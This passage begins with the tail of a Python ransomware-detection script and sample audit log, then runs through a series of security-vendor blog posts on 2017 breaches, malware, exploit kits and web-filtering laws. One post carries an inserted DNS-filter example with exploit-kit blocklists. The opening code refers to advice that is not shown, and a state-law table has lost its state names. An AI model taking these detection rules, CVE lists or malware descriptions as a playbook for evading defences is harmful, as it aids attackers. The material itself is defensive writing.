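2017-09-07T10:15:04 fs01 bob WRITE /srv/finance/q3_notes.docx
2017-09-07T10:16:10 fs01 alice RENAME /srv/hr/contracts/a.docx.locked
2017-09-07T10:16:11 fs01 alice RENAME /srv/hr/contracts/b.docx.locked
2017-09-07T10:16:11 fs01 alice RENAME /srv/hr/contracts/c.pdf.locked
2017-09-07T10:16:12 fs01 alice WRITE /srv/hr/contracts/README_DECRYPT.txt
2017-09-07T10:16:13 fs01 alice RENAME /srv/hr/contracts/d.xlsx.locked
2017-09-07T10:16:14 fs01 alice RENAME /srv/hr/contracts/e.jpg.locked
2017-09-07T10:16:20 fs01 alice WRITE /srv/finance/.canary/do_not_open.docx
2017-09-07T11:00:00 fs01 svc_bkp WRITE /srv/backups/finance-20170907.bak
"""

Event = Tuple[datetime, str, str, str, str]   # time, host, user, op, path


def parse(log: str) -> List[Event]:
    """Split audit lines into typed events; blank lines are ignored."""
    events: List[Event] = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, host, user, op, path = line.split(None, 4)
        events.append((datetime.fromisoformat(ts), host, user, op, path))
    return events


def detect(log: str) -> List[Dict[str, str]]:
    """Return one alert dict per indicator hit: kind, user, host, detail, when."""
    alerts: List[Dict[str, str]] = []
    recent: Dict[Tuple[str, str], Deque[datetime]] = defaultdict(deque)
    burst_alerted = set()            # alert once per (user, extension)
    for ts, host, user, op, path in parse(log):
        ext = os.path.splitext(path)[1].lower()
        name = os.path.basename(path)
        if path in CANARY_PATHS:     # decoy touched: no legitimate reason exists
            alerts.append(dict(kind="canary", user=user, host=host, detail=path, when=ts.isoformat()))
            continue
        if op in ("WRITE", "CREATE") and ext in NOTE_EXTENSIONS and RANSOM_NOTE.search(name):
            alerts.append(dict(kind="ransom_note", user=user, host=host, detail=name, when=ts.isoformat()))
            continue
        if op not in ("RENAME", "CREATE", "WRITE") or ext in KNOWN_EXTENSIONS:
            continue                 # familiar extensions never count toward a burst
        key = (user, ext)
        window = recent[key]
        window.append(ts)
        while (ts - window[0]).total_seconds() > WINDOW_SECONDS:
            window.popleft()         # drop events older than the window
        if len(window) >= BURST_THRESHOLD and key not in burst_alerted:
            burst_alerted.add(key)
            alerts.append(dict(kind="burst", user=user, host=host, detail=ext, when=ts.isoformat()))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The burst rule ignores familiar extensions so that a bulk save or a backup job does not trip it; the price is that a variant which encrypts files in place without renaming them is only caught by the canary. In production the alert would feed a response that disables the user's SMB session and isolates the host, which is where the least-privilege and segmentation advice above pays off: the damage is bounded by what that one account could reach.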
A massive Equifax data breach was announced yesterday, which ranks as one of the largest data breaches of 2017. Approximately 143 million consumers have been impacted and had their sensitive data exposed and potentially stolen.
A data breach at any company can cause considerable fallout, although this incident is particularly bad news for a credit reporting agency. Equifax aggregates and stores vast quantities of highly sensitive consumer data that are used by financial firms to make decisions about the creditworthiness of consumers. The data breach is sure to damage trust in the company.
Ironically, Equifax offers credit monitoring and identity theft protection services to companies that experience data breaches to help them protect breach victims. Naturally, all Americans affected by the Equifax data breach will be offered those services free of charge. In fact, Equifax has gone further by agreeing to offer those services free of charge to all U.S. consumers for a period of one year, even if they were not directly affected by the breach.
Chairman and Chief Executive Officer, Richard F. Smith, said “This is clearly a disappointing event for our company, and one that strikes at the heart of who we are and what we do. I apologize to consumers and our business customers for the concern and frustration this causes.”
The Equifax data breach may not be the largest data breach of 2017, but the nature of the data exposed makes it one of the most serious. Highly sensitive data were exposed, including personal information, Social Security numbers, birthdates and driver’s license numbers, and 209,000 consumers had their credit card numbers exposed.
These are the exact types of information used by cybercriminals to commit identity theft and fraud. Dispute documents were also stored on the compromised system. Those documents contained a range of personal information on 182,000 consumers. The bulk of the data related to U.S. citizens, although some consumers in Canada and the United Kingdom have also been affected by the Equifax data breach.
The hacker(s) responsible for the attack had access to Equifax’s systems for a considerable period of time before the breach was discovered. Access was first gained to systems in mid-May and continued until July 29, 2017 when the breach was discovered.
According to a statement released by Equifax yesterday, hackers gained access to its systems by exploiting a website vulnerability. While sensitive data were exposed and potentially stolen, Equifax reports that its core databases that are used for credit referencing purposes, were not compromised at any point.
The data breach is still being investigated and a third-party cybersecurity firm has been hired to assist with the investigation. Smith said, “I’ve told our entire team that our goal can’t be simply to fix the problem and move on. Confronting cybersecurity risks is a daily fight. While we’ve made significant investments in data security, we recognize we must do more. And we will.”
Breach notification letters are being sent to some, but not all, breach victims. Only the 391,000 individuals whose credit card numbers or dispute documents were exposed will receive notifications by mail. All other individuals will have to check an online tool to find out if their information was exposed in the breach.
Earlier this year, the NeutrinoPOS banking Trojan source code was leaked, leading to several new variants of malware being created, the latest being Jimmy Nukebot. In contrast to its predecessor, which was used to steal bank card information, the latest version has lost that functionality.
However, Jimmy Nukebot can perform a wide range of malicious functions, serving as a downloader for a wide range of malicious payloads. The malware also acts as a backdoor that allows the actors behind it to monitor activity on an infected device.
Security researchers at Kaspersky Lab have analysed Jimmy Nukebot infections and have seen the malware download a wide range of modules including Monero cryptocurrency mining malware, web-injects similar to those used in NeutrinoPOS, and various other modules that modify the functions of the malware. The malware can take screenshots of an infected device and exfiltrate data and could download any malicious payload onto an infected device.
Publication of the source code of malware results in an increase in its popularity. With the malware used in more attacks, the probability of it being detected is much higher. In order to evade detection, considerable modification to the malware is required. This could well be the reason why so many changes have been made to the latest iteration. The authors of Jimmy Nukebot took the original source code of the NeutrinoPOS banking Trojan and totally restructured the malware. The way the new malware has been constructed also makes static analysis much more complicated.
The new features of the malware make it a formidable threat. Jimmy Nukebot is able to learn about the system on which it is installed and use that information for exploitation, tailoring the payload it delivers based on its environment rather than performing a pre-set malicious activity immediately upon infection.
Since the malware passively collects information and responds accordingly, it is unlikely to trigger AV alerts and may remain undetected. Organizations that have the malware installed are therefore unlikely to be aware that their systems have been compromised.
Protecting against threats such as this requires advanced malware defences, although as with most malware infections, they occur as a result of the actions of end users such as opening infected email attachments, clicking hyperlinks in emails or visiting websites that silently download malware.
Improving security awareness of employees will go a long way toward preventing malware from being installed. Coupled with an advanced spam filter to block email-based threats, a web filter to block redirects to exploit kits, regular patching, the enforced use of strong passwords, and advanced anti-malware technology, organisations can protect themselves against malware threats.
Downloading apps from non-official sources potentially places users at risk, but Google Play Store malware infected apps do exist. Google has controls in place to prevent malicious apps from being uploaded to its app store, but those controls are not always 100% effective. Choosing to download apps only from official stores is no guarantee that the apps will be free from malware.
Security researchers recently discovered around 300 apps offered through the Google Play store that appear to be legitimate programs, yet are infected with malware that adds infected devices to a large botnet. The botnet was being used to launch distributed denial of service (DDoS) attacks on websites.
The botnet, dubbed WireX, comprises tens of thousands of Android devices that are being used in highly damaging cyberattacks. Devices started to be infected in early July, with a steady rise in additions over the following weeks. Even though the number of compromised devices grew steadily in July, the botnet was only discovered in early August, when it started to be used in small-scale DDoS attacks.
Since then, larger attacks have taken place, mostly targeting the hospitality sector. Those attacks have clogged websites with junk traffic, preventing legitimate users from accessing the sites. Some of the WireX DDoS attacks involved as many as 160,000 unique IP addresses. Since a single mobile device can appear under several IP addresses over the course of an attack, the size of the botnet has been estimated at around 70,000 devices.
The growth of the botnet was soon attributed to malicious apps, with researchers discovering around 300 Google Play Store malware infected apps. Google has now disabled those apps and is in the process of removing them from devices.
The apps included video players, battery boosters, file managers and ringtones. The apps were not simply malware, as users would undoubtedly attempt to delete them if they failed to perform their advertised functions. The apps all worked, and users who downloaded them were unaware that their devices were being used for malicious purposes. The malware used a ‘headless browser’, which performs the functions of a standard browser without displaying anything to the user, allowing the actors behind the malware to operate undetected.
When the devices were needed for DDoS attacks, they would receive commands from their C2 server to attack specific websites.
Multiple security vendors including Akamai, RiskIQ, Flashpoint and Cloudflare collaborated and succeeded in taking down the WireX botnet. Without that collaboration, the botnet would still be active today and may not have been detected.
The Neptune Exploit kit is being used to turn computers into cryptocurrency miners, with traffic directed to the exploit kit using a hiking-themed malvertising campaign.
Exploit kit activity has fallen this year, although these web-based attacks still pose a significant threat. Exploit kits are web-based toolkits that probe browsers and plugins for vulnerabilities that can be exploited to download malware. Simply visiting a website hosting an exploit kit is all it takes for malware to be silently downloaded.
Protecting against exploit kit attacks requires browsers, plugins and extensions to be kept 100% up to date. However, even updated browsers can be vulnerable. Exploit kits can also include exploits for zero-day vulnerabilities that have not yet been patched.
Acceptable usage policies can help organizations to prevent exploit kit attacks, although website visitors are often redirected to malicious sites from legitimate websites. One of the main ways this happens is through malvertisements. Many high-traffic websites include advertising blocks that display third-party adverts. The advertising networks serve adverts that are displayed on member sites, with the site owners earning money from ad impressions and click-throughs.
While the advertising networks have measures in place to vet advertisers, oftentimes cybercriminals succeed in submitting malicious adverts. Those adverts are then pushed out and displayed on legitimate websites. Clicking one of those malicious adverts will see the user directed to a webpage hosting the exploit kit.
Exploit kits are used to download Trojans, ransomware and other malicious code, although the Neptune exploit kit is currently being used to deliver cryptocurrency miners. Once infected, a computer’s processing power is used to mine the Monero cryptocurrency, hogging the machine’s resources and slowing its performance.
The latest Neptune exploit kit campaign uses hiking club-related adverts to drive traffic to landing pages hosting the Neptune exploit kit, which in turn uses HTML and Flash exploits to download malware. These adverts closely mimic genuine domains. FireEye reports that one such campaign mimics the genuine website highspirittreks[.]com using the domain highspirittreks[.]club. Other campaigns offer a service to convert YouTube videos to MP3 files. The imagery used in the adverts is professional and the malvertising campaigns are likely to fool many web surfers.
The exploits used in the latest campaign are all old, therefore, protecting against attacks simply requires plugins and browsers to be updated. The main exploits take advantage of flaws in Internet Explorer – CVE-2016-0189, CVE-2015-2419, CVE-2014-6332 – and Adobe Flash – CVE-2015-8651, CVE-2015-7645.
Having a computer turned into a cryptocurrency miner may not be the worst attack scenario, although exploit kits can rapidly switch their payload. Other exploit kits are being used to deliver far more damaging malware, which will be downloaded silently without the user’s knowledge. Consequently, organizations should take precautions.
In addition to prompt patching and updating of software, organizations can improve their defences against exploit kits by implementing a web filtering solution such as WebTitan.
WebTitan can be configured to block all known malicious sites where drive-by downloads take place and can prevent malvertisements from directing end users to webpages hosting these malicious toolkits.
To find out more about WebTitan and how it can improve your organization’s security posture, contact the TitanHQ team today.
India’s Central Board of Secondary Education is urging all CBSE affiliated schools to take action to improve safety for students, including implementing school web filtering technology to keep students safe online.
The Internet is home to an extensive range of potentially harmful material that can have a major impact on young developing minds. Parents can take action to keep their children safe at home by using parental control filters. However, students must receive similar or greater levels of protection while at school.
School web filtering technology can prevent students from deliberately or accidentally viewing obscene material such as pornography, child pornography or images of child abuse and other categories of potentially harmful website content. CBSE has warned school boards that when students access this material it is “detrimental to themselves, their peers and the value system.” School web filtering technology should also be implemented to prevent students from engaging in illegal activities online via school IT devices.
CBSE-affiliated schools have been advised to develop guidelines for safe Internet use, make this information available to students, and display the rules prominently. However, without school web filtering technology, these policies would be easy to ignore. A technological solution ensures that students wishing to engage in illegal activities online, or to view harmful website content, will be prevented from doing so.
Prevention is only one aspect of Internet control. Schools should also set up a monitoring system to discover when individuals are attempting to bypass Internet usage policies. A web filtering solution should therefore have the capability to generate reports of attempted accessing of prohibited material to allow schools to take action. Schools have also been advised to sensitise parents about safety norms and even go as far as suggesting disciplinary action be taken when children are discovered to have attempted to access inappropriate material.
While many school systems around the world have implemented school web filtering technology, CBSE is advising affiliated schools in India to go one step further and restrict Internet content by age group. Schools should set filtering controls by user group and restrict access to age-inappropriate websites. Web filtering solutions such as WebTitan allow controls to be easily set for different user groups. The solution can be used to set separate filtering controls for staff and for students of differing ages with ease.
Other Internet controls that have been suggested include promptly disabling usernames/passwords when children leave the school, using antivirus solutions to reduce the risk of malware infections, using firewalls to prevent cyberattacks and the theft of children’s sensitive information, and for staff to avoid posting images and videos of their students online.
School Web Filtering Technology from TitanHQ
The benefits of implementing school web filtering technology are clear, but choosing the most cost-effective controls can be a challenge.
Appliance based web filters involve a significant initial cost, there is ongoing maintenance to consider, the need for on-site IT support in many cases, and as the number of Internet users increases, hardware upgrades may be necessary.
TitanHQ offers a more cost-effective and easy to manage solution – The 100% cloud-based web filter, WebTitan.
WebTitan Cloud and WebTitan Cloud for WiFi makes filtering the internet a quick and easy process. There is no need for any hardware purchases or software installations. To start filtering the Internet and protecting students from harmful web content, all that is required is to point your DNS to WebTitan. Once that simple change has been made you can be filtering the Internet in minutes.
Both solutions can be easily configured to block different categories of website content, such as pornography, file sharing websites, gambling and gaming websites and other undesirable website content. The solutions support blacklists, allowing phishing and malware-infected sites to be easily blocked along with all webpages identified by the Internet Watch Foundation as containing images of child abuse and child pornography.
These powerful web filtering solutions require no software updates or patching. All updates are handled by TitanHQ. Once acceptable Internet usage policies have been set via the intuitive web-based control panel, maintenance only requires occasional updates such as adding legitimate webpages to whitelists. Even blacklists are updated automatically.
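Several passages above describe what a DNS-based web filter does without showing the decision it makes per query: blocking the third-party ad networks and redirect domains behind malvertising, blocking known exploit kit landing pages, per-group policies for staff and for students of different ages, and reporting attempted access to prohibited material. The following is an added example of that decision logic in miniature; it is not WebTitan’s code and does not describe how WebTitan is implemented. The category feed, blocklist, allowlist, group policies and query log are all constructed for the example. It also includes a lookalike-domain heuristic of the kind that would have flagged the Neptune campaign’s highspirittreks[.]club alongside the genuine highspirittreks[.]com; that heuristic is deliberately simple (no public suffix list, no typo-squat detection) and is an assumption of the example, not a claim about any product.

```python
"""Miniature DNS-layer content filter. Added example; not WebTitan's code.

Decision order per query, as a DNS filter would apply it:
allowlist -> blocklist -> category policy for the requesting group ->
lookalike-domain heuristic -> allow. All data below is constructed.
"""
from collections import Counter
from typing import Dict, Iterator, List, Optional, Set, Tuple

# Constructed category feed; a real filter pulls this from a vendor database.
CATEGORY_DB: Dict[str, str] = {
    "pornhub.com": "adult",
    "example-ads.net": "advertising",      # third-party ad network
    "highspirittreks.com": "sports",       # genuine site mimicked in the Neptune campaign
    "gambling.example": "gambling",
    "bbc.co.uk": "news",
}
BLOCKLIST: Set[str] = {"ek-landing.example"}   # known drive-by / exploit kit hosts (constructed)
ALLOWLIST: Set[str] = {"bbc.co.uk"}            # always resolves, whatever the category rules say

# Categories denied to each user group (separate controls for staff and students).
GROUP_POLICY: Dict[str, Set[str]] = {
    "students_junior": {"adult", "gambling", "gaming", "file_sharing", "advertising", "malware", "phishing"},
    "students_senior": {"adult", "gambling", "advertising", "malware", "phishing"},
    "staff": {"adult", "gambling", "advertising", "malware", "phishing"},
}
STRICTEST_GROUP = "students_junior"   # unknown groups fail closed onto this policy

KNOWN_DOMAINS = set(CATEGORY_DB) | ALLOWLIST
# brand label -> registrable domain, e.g. "highspirittreks" -> "highspirittreks.com"
BRANDS = {d.split(".", 1)[0]: d for d in KNOWN_DOMAINS}


def normalize(fqdn: str) -> str:
    return fqdn.strip().lower().rstrip(".")


def parent_domains(fqdn: str) -> Iterator[str]:
    """a.b.example.com -> a.b.example.com, b.example.com, example.com, com"""
    labels = fqdn.split(".")
    for i in range(len(labels)):
        yield ".".join(labels[i:])


def longest_match(fqdn: str, table) -> Optional[str]:
    """Longest entry of `table` equal to the name or one of its parents."""
    for candidate in parent_domains(fqdn):
        if candidate in table:
            return candidate
    return None


def lookalike_of(fqdn: str) -> Optional[str]:
    """Flag a known brand label under a different suffix (highspirittreks.club)
    or used as a subdomain of an unrelated domain (bbc.co.uk.evil.example).
    Assumed heuristic: no public suffix list, no typo-squat detection."""
    for candidate in parent_domains(fqdn):
        if "." not in candidate:
            continue
        known = BRANDS.get(candidate.split(".", 1)[0])
        if known and candidate != known and not candidate.endswith("." + known):
            return known
    return None


def decide(fqdn: str, group: str) -> Tuple[str, str]:
    """Return (action, reason) for one DNS query from a user in `group`."""
    name = normalize(fqdn)
    if longest_match(name, ALLOWLIST):
        return "allow", "allowlist"
    hit = longest_match(name, BLOCKLIST)
    if hit:
        return "block", f"blocklist:{hit}"
    hit = longest_match(name, CATEGORY_DB)
    if hit:
        category = CATEGORY_DB[hit]
        denied = GROUP_POLICY.get(group, GROUP_POLICY[STRICTEST_GROUP])
        return ("block" if category in denied else "allow"), f"category:{category}"
    mimicked = lookalike_of(name)
    if mimicked:
        return "block", f"lookalike:{mimicked}"
    return "allow", "uncategorized"


def blocked_report(queries: List[Tuple[str, str]]) -> Counter:
    """Count blocked queries by (group, reason): the attempted-access report schools want."""
    report: Counter = Counter()
    for group, fqdn in queries:
        action, reason = decide(fqdn, group)
        if action == "block":
            report[(group, reason)] += 1
    return report


if __name__ == "__main__":
    LOG = [   # constructed query log: (group, queried name)
        ("staff", "www.bbc.co.uk"),
        ("staff", "highspirittreks.club"),           # malvertising lookalike
        ("students_junior", "cdn.example-ads.net"),  # third-party ad network
        ("students_junior", "www.pornhub.com"),
        ("students_senior", "ek-landing.example"),
        ("contractor", "www.example.org"),           # unknown group, uncategorized name
    ]
    for group, name in LOG:
        print(f"{group:16} {name:28} -> {decide(name, group)}")
    for key, count in blocked_report(LOG).items():
        print("blocked", key, count)
```

Two design points carry over to a real deployment. Matching walks from the full name up through its parents, so a rule on the registrable domain covers every CDN or tracking subdomain the ad network uses, and an unknown group inherits the strictest policy rather than an empty one, so a misconfigured client never gets unfiltered resolution. The lookalike check only runs for names the feed does not know, which keeps it from second-guessing the category database.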
If you are keen to implement school web filtering technology for the first time or are unhappy with your current provider, contact the TitanHQ team today and register for your no-obligation free trial to see the benefits of WebTitan for yourself before making a decision about a purchase.
Internet filtering laws in the United States are mostly introduced at the state level, although federal legislation has been introduced for schools and libraries – The Children’s Internet Protection Act (CIPA).
Typically, Internet filtering laws in the United States are concerned with protecting minors. Laws apply to schools and libraries, although some states also require publicly funded institutions to apply controls to block the accessing of pornography, obscene and other harmful material by minors.
However, legislation is now being considered to force vendors or suppliers of Internet-enabled devices to implement Internet filtering technology by default. The aim is not to prevent adults from accessing pornographic material on their personal devices, only to ensure that there are some controls in place. That means all vendors/suppliers of Internet-enabled devices will be required to implement a web filtering control, with the new device owners required to opt in if they wish to view pornography. Opting in must be done in writing and requires proof of age.
Consumers will also be required to pay a fee to have the Internet filtering software removed. In South Carolina, legislation has been proposed that would require consumers to pay $20 to have the pornography block removed. The legislation was filed with the South Carolina General Assembly in December 2016. Similar legislation was also proposed in Utah in 2016.
Federal Internet Filtering Laws in the United States
At the federal level, all schools and libraries are required to comply with CIPA and implement web filters to prevent minors from accessing obscene material, pornographic images, images of child abuse, and other potentially harmful material if they wish to apply for discounts under the E-rate program or accept Library Services and Technology Act grants. If organizations choose not to apply for those grants or receive E-rate discounts, Internet filtering laws in the United States do not apply, at least at the federal level.
State-Level Legislation on Internet Controls
Internet filtering laws in the United States are applied at the state level and usually concern K-12 schools and public libraries. Not all states require Internet filters to be applied. Some only require policies to be introduced to restrict access.
Individual states that have introduced legislation requiring schools and libraries to implement web filters or policies to control the content that can be accessed by minors are summarized in the table below. Since state laws often change, it is strongly advisable to consult your state department for updates to state legislation.
When policies are required to control access, schools and libraries may prefer to use a software or cloud-based solution to provide a greater level of protection. State laws are only concerned with ensuring the minimum level of Internet safety for minors when venturing online.
Quick Reference Guide Detailing U.S. States with Internet Filtering Laws (2017)
[Table: the state-name column did not survive extraction. The "filtering required" column reads, in order: Yes (Technology or policies); Yes (Policies and Technology); Yes (Policies or Technology); No (Policies or Technology); No (Under evaluation); Yes (Policies or Technology); Yes (Policies or Technology). Footnotes follow.]
* Libraries that apply for and receive funding through the Enrich Iowa Program
** Public libraries receiving state funding must also apply filtering controls to prevent adults from accessing obscene material, including child pornography.
*** Home-schooled students must also be provided with a filtering device or service
The following states have introduced legislation that requires Internet service providers to offer web filtering services to allow state residents to protect children from accessing potential harmful website content
Internet filtering laws in the United States are subject to change. The Internet filtering laws in the United States detailed on this page are for information purposes only. Schools and libraries should consult their state/education departments for details of the laws that apply in their state.
Law firm hacking incidents are up and recent attacks have shown cybersecurity best practices for law firms are not being adhered to. Unless cybersecurity defenses are improved, it is too easy for hackers to gain access to sensitive data.
Cybercriminals have their sights firmly set on lawyers, or more specifically, the treasure trove of highly sensitive data stored on their computers and networks: data that, in the wrong hands, could be used for blackmail.
Clients share highly sensitive information with their legal teams. Lawyers store company secrets, employment contracts and PII, banking details, financial projections, medical records, and naturally information about current and future lawsuits. All of this information is highly valuable to hackers and can be used for blackmail, sold to competitors, or used for all manner of nefarious purposes. It is therefore no surprise that hackers want to attack law firms and that they are increasingly doing just that.
Cyberattacks are not only about stealing data. It can also be lucrative to prevent lawyers from gaining access to their clients’ files. Ransomware attacks on law firms can result in sizable payments for the keys to unlock the encryption.
For the most part, malware and ransomware attacks on law firms are entirely preventable. Simply adopting standard cybersecurity best practices for law firms will prevent the majority of attacks.
One recent ransomware attack on a Providence law firm resulted in a ransom payment of $25,000 being made to the attackers to regain access to the firm’s data. The incident is also a good example of how damaging those attacks can be. Even though payment was made, the law firm lost access to its files for three months, essentially preventing the firm from conducting any business. Lost billings alone cost the firm around $700,000.
Malware and ransomware attacks on law firms are common, although they are underreported for obvious reasons. One incident that was covered in the press was the malware attack on DLA Piper. The attack involved NotPetya, the wiper malware that caused chaos for many organizations around the globe in June. DLA Piper lost access to its data, causing huge losses that are likely to be in the millions.
Part of the problem, especially for smaller law firms, is the high cost of cybersecurity protections. Many law firms simply do not have the budget to cover the cost. They cannot afford to hire skilled cybersecurity professionals to protect their computers and networks, scan for security vulnerabilities and patch and update software. However, the good news is that adopting standard cybersecurity best practices for law firms does not cost big bucks, but it will help firms improve their security posture.
The DLA Piper cyberattack shows that it is not only small law firms that are not following cybersecurity best practices for law firms. Microsoft issued a patch to fix the vulnerability that was exploited by both WannaCry and NotPetya more than two months before the attacks occurred. If the firm had patched promptly, the attack would have been prevented.
Protecting against all cyberattacks is not straightforward, especially with the number of connected devices now used by law firms. However, by adopting the cybersecurity best practices for law firms below, it is possible to reduce risk to an acceptable level.
Cybersecurity Best Practices for Law Firms
Adopting these cybersecurity best practices for law firms will make it harder for hackers to break through defenses and for simple errors to result in costly data breaches.
- Conduct weekly checks of all software to ensure the latest versions are installed and check for patches and apply them promptly
- Ensure that ALL sensitive data is backed up using the 3-2-1 approach: three copies of data, on two types of media, with one copy stored securely off site
- Ensure all staff undergo security awareness training covering phishing, social engineering and other threats
- Develop a password policy that requires the use of strong passwords. Enforce password changes regularly
- Consider encryption for all sensitive data
- Use two-factor authentication
- Use an advanced spam filtering solution to reduce spam and block malicious messages
- Employ a next-generation firewall
- Ensure all computers are running supported operating systems and are set to update automatically
- Implement a web filtering solution to block access to all sites known to host malware and exploit kits and to block links to phishing websites
- Develop a data breach response plan – When a breach occurs, fast action can greatly reduce the damage caused
- Engage the services of a third-party security firm to conduct risk analyses to identify vulnerabilities and perform penetration tests
- Consider outsourcing cybersecurity to a managed service provider that will ensure systems, software and security are effectively managed and all vulnerabilities are addressed
- Consider cybersecurity insurance – Only 23% of law firms have purchased cybersecurity insurance according to Logicforce.
A new mobile malware threat has been discovered – Invisible Man Malware – that is being installed via fake software updates. Invisible Man malware is a keylogger that has been designed to obtain banking credentials. While the malware is not new – it has been around for four years – it is frequently updated, with a new variant discovered that takes advantage of the accessibility services on Android devices.
As the name suggests, Invisible Man malware runs silently on infected devices, unbeknownst to the user. The malware is an overlay that sits atop legitimate banking apps and intercepts inputs as they are entered on the device. It also allows the attackers behind the malware to intercept text messages, in particular those used for two-factor authentication and codes sent by banks to authorize transactions.
Once installed on a device it has administrator rights to all Android accessibility services, is installed as the default SMS app and has rights to send and receive SMS messages, make calls, and access contacts on the phone. It can also take screenshots and prevents itself from being uninstalled, according to Kaspersky Lab.
Invisible Man malware has been developed for attacks in Australia, France, Germany, Poland, Singapore, Turkey and the UK, working as a keylogger over 63 banking apps. All data collected is immediately transferred to its C2 server.
Kaspersky Lab reports that Invisible Man malware is primarily being installed on devices using fake software updates, specifically fake Flash Player updates on malicious websites via a downloaded apk file.
Beware of Fake Software Updates
The latest attacks highlight an important point. If you receive a warning on screen telling you that your software is out of date, don’t click and download the update. In this case, the user will be asked to confirm installation, and will be required to provide this app with administrator rights to accessibility services.
Fake software updates are one of the most common methods used to distribute malware, bloatware, adware, ransomware and other nasties.
Given the frequency of software updates now being released to address recently found vulnerabilities, your software may actually be out of date. However, you should visit the vendor’s website and perform a check to see if you have the latest version installed. If not, download the update directly from the vendor’s website.
Fake software updates are usually offered via pop-ups, windows that appear when you access a website. They commonly feature flashing GIFs and stern warnings of the risks of not updating your software immediately. Warnings that your computer has already been infected with malware are also common.
Warnings do not only appear when surfing the Internet; spammers use the same tactics via email. The emails often use the same logos, color schemes and branding as the legitimate software vendor and look highly realistic.
However, you should not trust any email asking for you to download an executable, part with login credentials or provide other sensitive information, even if it is sent from someone you know.
A new study has shown that cybercriminals have generated ransomware profits in excess of $25 million over the past two years, clearly demonstrating why cryptoransomware attacks have soared. There is big money to be made in this form of cyber extortion. The bad news is that with so many organizations paying to recover their files, the ransomware attacks will continue and will likely increase.
Ransomware attacks are profitable because users are still failing to back up their data. Google’s figures suggest that even though the threat of data deletion or encryption is high, only 37% of computer users back up their data. That means if ransomware encrypts files, the only option to recover data is to pay the ransom demand.
Figures from the FBI estimated ransomware payments to have exceeded $1 billion in 2016; however, it is difficult to accurately calculate ransomware profits since the authors go to great lengths to hide their activities. Ransomware profits are difficult to track and companies are reluctant to announce attacks and whether payment has been made.
One notable exception was the South Korean hosting company Nayana, which was attacked and had 153 Linux servers and 3,400 customer websites encrypted. The firm paid 1.2 billion Won – approximately $1 million – for the keys to unlock the encryption. In another recent case, a Canadian company has reportedly paid a ransom of $425,000 to recover its files, although the identity of the firm is still unknown.
Now, a study conducted by Google, with assistance from Chainalysis, the University of California at San Diego, and New York University’s Tandon School of Engineering has shed some light on actual ransomware profits. The study involved an analysis using blockchains and Bitcoin wallets known to have been used to collect ransomware payments. The researchers also used reports from victims and monitored network traffic generated by victims of ransomware attacks to help track where payments were sent.
The study looked at the top 34 ransomware strains and determined more than $25 million has been collected in the past two years. 95% of payments were cashed out using the Bitcoin trading platform BTC-e.
Google has calculated Locky has earned $7.8 million in ransom payments over the past 24 months – 28% of the total payments made. Cerber is in second place with $6.9 million, followed by CryptoLocker on $2 million and CryptXXX and Sam Sam, both on $1.9 million. Spora ransomware may not have made it into the top five, although Google researchers warn that this is an up-and-coming ransomware variant and one to watch over the coming months.
In recent months Cerber ransomware has become the most widely used ransomware variant. The success of Cerber ransomware can be attributed to the skill of the developers in developing a ransomware variant that can evade detection and the affiliate model used to distribute the ransomware – Ransomware-as-a-Service (RaaS).
RaaS means any number of individuals can conduct ransomware campaigns. Kits are offered to anyone willing to conduct campaigns. Little technical skill is required. All that is required is a lack of moral fiber and the ability to send spam emails distributing the ransomware. Affiliates receive a percentage of the ransomware profits.
WannaCry ransomware certainly caused something of a storm when the worldwide attacks were conducted in May, and while there were more than 200,000 victims worldwide and some 300,000 computers affected, a flaw in the design meant the attacks could be halted and relatively few ransom payments were made. The ransomware profits from these attacks were calculated by Google to be around $100,000.
Ransomware profits from NotPetya were low, although making money was never the aim. NotPetya appeared to be ransomware, although it was actually a wiper. A ransomware demand was issued, but it was not possible to recover data on infected machines. Once this became clear, ransoms were not paid.
The success of Locky, Cerber and CryptXXX is due to the skill of the developers at evading detection. These ransomware variants are constantly evolving to stay one step ahead of security researchers. In the case of Cerber, the researchers discovered thousands of new binaries are being detected each month. There are 23,000 binaries for Cerber and around 6,000 for Locky. In total, the study involved an analysis of 301,588 binaries. The malware variants are capable of changing binaries automatically making detection difficult.
Ransomware attacks may still only make up a small percentage of the total number of malware-related incidents – less than 1% – but the threat is still severe and the attacks are likely to continue, if not increase. As long as it is profitable to develop ransomware and/or use existing ransomware variants, the attacks will continue.
Kylie McRoberts, a senior strategist with Google’s Safe Browsing team, said “Ransomware is here to stay and we will have to deal with for a long time to come.”
It has been a long time coming, and we are not quite there yet, but Adobe Flash is about to die. The long, slow, drawn-out death of Adobe Flash will continue for another three years yet, with Adobe finally confirming that it will be pulling the plug by December 31, 2020. By then, all updates for Adobe Flash will stop and we will all enter a Flash-free age.
Until then, Adobe is committed to working with partners to ensure Flash remains as secure as possible and updates will continue until that time. However, Adobe is already trying to encourage businesses to start switching to other standards such as HTML5.
The decision to finally put Flash out of its misery was made because other platforms and technology have “matured enough and are capable enough to provide viable alternatives to the Flash player,” according to Adobe.
In 2005, Flash was on 98% of all computers, and even three years ago it was being used by 80% of desktop users on a daily basis. Today, helped in no small part by the serious security flaws in the platform and the switch from PCs to mobile devices, usage has fallen to just 14%.
Google is not supporting Flash anymore and has not done so for Android since 2012. Apple has never supported the plug-in on its mobile devices and Firefox, Chrome, Edge and Safari no longer run Flash content automatically. Even Internet Explorer will disable Flash by default in 2019, ahead of its official death date the following year.
Of course, just stopping updates does not mean that Flash will cease to exist. But given the rate that vulnerabilities in Flash are now being discovered, anyone still using Flash by 2020 will be wide open to attack as soon as the updates stop. However, by then there will be far fewer websites using Flash and fewer devices with the Flash plug-in installed.
The Internet will most likely be a safer place without Flash, but what will happen to all the hackers who are currently developing exploits for Flash vulnerabilities? They will not simply retire. Instead they will put their efforts into something else. What that is, of course, remains to be seen.
Three years may seem like an awfully long time, but there are still many businesses that continue to use Flash and have yet to migrate to other standards. Flash is still extensively used by educational institutions for training programs, while web-based gaming websites will also need time to transition.
Govind Balakrishnan, Adobe’s vice president of product development, pointed out the importance of Flash saying, “Few technologies have had such a profound and positive impact in the Internet era.” That is certainly true, but all good things must come to an end and few will be sorry to see Flash finally die. The end came long ago, but at least now there is an official date when the final nail will be hammered into the coffin.
Stantinko malware may only have recently been detected, but it is far from a new malware variant. It has been in use for the past five years, yet has only now been identified. During those five years, Stantinko malware has spread to more than 500,000 devices and has been operating silently, adding infected systems to a large botnet, with the majority of infected machines in Russia and Ukraine.
